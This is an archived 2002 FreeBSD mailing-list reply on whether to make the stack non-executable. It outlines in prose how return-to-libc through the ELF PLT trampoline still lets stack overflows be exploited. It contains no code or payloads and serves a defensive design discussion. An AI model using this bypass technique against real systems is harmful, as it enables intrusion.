Date: Sun, 30 Jun 2002 00:00:05 -0700 From: Peter Wemm <peter@wemm.org> To: Terry Lambert <tlambert2@mindspring.com> Cc: arch@FreeBSD.ORG Subject: Re: Time to make the stack non-executable? Message-ID: <20020630070005.092FD390F@overcee.wemm.org> In-Reply-To: <3D1E3126.C96FFAA5@mindspring.com>
next in thread | previous in thread | raw e-mail | index | archive | help
Terry Lambert wrote: > Sean Eric Fagan and I discussed this several years ago, and we > discussed it again the other day, before this attack hit. It > looks like it's an idea whose time has come. The Linux folks have been tinkering with this on and off for years. There's one problem. Making the stack not-executable only makes exploits a bit harder, but doesn't solve the problem. There is some nice executable trampoline code in the ELF PLT that can be abused to make libc do the execution part for you. ie: most stack overflow holes would still be exploitable. It just makes it a little harder since you can only push data instead of shellcode. But that's all there is to it, you push your args, the set the return address to point to the PLT trapoline and in most cases you are home. Making the stack non-executable is not the final solution. It just raises the bar a bit. Note that I'm not saying that we shouldn't do it, just do not have unrealistic expectations for it. Cheers, -Peter -- Peter Wemm - peter@wemm.org; peter@FreeBSD.org; peter@yahoo-inc.com "All of this is for nothing if we don't go to the stars" - JMS/B5 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-arch" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20020630070005.092FD390F>